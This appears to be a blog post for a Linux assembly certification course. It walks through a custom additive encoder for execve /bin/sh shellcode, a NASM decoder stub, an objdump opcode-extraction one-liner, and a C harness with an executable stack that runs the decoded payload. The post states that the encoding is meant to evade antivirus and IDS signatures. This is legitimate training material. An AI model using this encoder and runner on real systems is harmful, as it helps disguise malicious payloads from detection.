Assignment_4 – Custom Encoder

This  post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-581
###

 Encoding of shellcode is very important in real life, because vast majority of antiviruses and IDS are configured to catch commonly used signatures while encoding makes the process of shellcode detection more difficult.

 The script below encodes shellcode by adding 0x1 to every byte.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/python

# Python add Encoder



#execve original shellcode


shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
        # ADD Encoding
        y = x+0x1
        encoded += '\\x'
        encoded += '%02x' % y

        encoded2 += '0x'
        encoded2 += '%02x,' %y


print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))










Let's run encoder script:



python encoder.py

Encoded shellcode ...

\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x32\xd3\xb1\x0c\xce\x81

0x32,0xc1,0x51,0x69,0x30,0x30,0x74,0x69,0x69,0x30,0x63,0x6a,0x6f,0x8a,0xe4,0x51,0x54,0x8a,0xe2,0x32,0xd3,0xb1,0x0c,0xce,0x81,

Len: 25







Its output is encoded shellcode which we gonna use in our decoder.

The script below converts the data back to the original code, after which original code is executed:








 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


global _start

section .text
_start:


jmp short call_shellcode


decoder:
        pop esi
        xor ecx, ecx
        mov cl, 25

        decode:
        sub byte [esi], 0x1
        inc esi
        loop decode

        jmp short shellcode_to_decode

call_shellcode:
        call decoder
        shellcode_to_decode: db 0x32,0xc1,0x51,0x69,0x30,0x30,0x74,0x69,0x69,0x30,0x63,0x6a,0x6f,0x8a,0xe4,0x51,0x54,0x8a,0xe2,0x32,0xd3,0xb1,0x0c,0x
ce,0x81












As you see decoding schema is pretty simple: we use sub command to reverse our shellcode to origin:



Lets compile and link our code:



root@debian:/usr/local/src/SLAE/4_assigment# nasm -f elf32 my_decoder.nasm -o my_decoder.o
root@debian:/usr/local/src/SLAE/4_assigment# ld my_decoder.o -o my_decoder



And now we have to extract our shellcode from elf:



objdump -d ./my_decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'



"\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x2e\x01\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x32\xd3\xb1\x0c\xce\x81"



Load in checker.c










 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


#include<stdio.h>
#include<string.h>

unsigned char shellcode[] ="\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x2e\x01\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\
x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x32\xd3\xb1\x0c\xce\x81";

main()
{
        printf("Shellcode Length: %d\n",strlen(shellcode));
        int (*ret)() = (int(*)())shellcode;
        ret();
}










Compile our checker:

gcc -fno-stack-protector -z execstack checker.c -o checker



and run:

root@debian:/usr/local/src/SLAE/4_assigment# ./checker

Shellcode Length: 45

#



works fine)

















































No comments:















Post a Comment


















        

      









Subscribe to:
Posts (Atom)